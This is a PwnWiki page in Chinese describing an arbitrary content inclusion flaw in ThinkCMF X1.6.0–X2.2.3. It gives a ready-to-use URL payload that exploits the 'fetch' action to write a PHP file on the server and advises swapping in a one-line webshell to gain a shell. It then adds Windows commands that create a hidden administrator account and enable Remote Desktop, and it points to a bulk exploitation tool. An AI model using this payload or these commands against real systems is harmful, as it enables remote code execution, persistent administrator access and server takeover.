ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞

From PwnWiki
Revision as of 15:54, 2 July 2021 by Kongxu (talk | contribs) (thinkcmf批量利用工具)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞

影響版本:

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

漏洞利用:

使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
 訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
 訪問:
http://127.0.0.1/cmfx/test.php
即可顯示PHPINFO信息。 修改Payload爲一句話木馬即可Getshell。

新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):

net user test test /add net localgroup administrators test /add REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

thinkcmf批量利用工具

Thinkcmf批量利用工具

Retrieved from "https://pwnwiki.com/index.php?title=ThinkCMF_X1.6.0-X2.2.3框架任意內容包含漏洞&oldid=6140"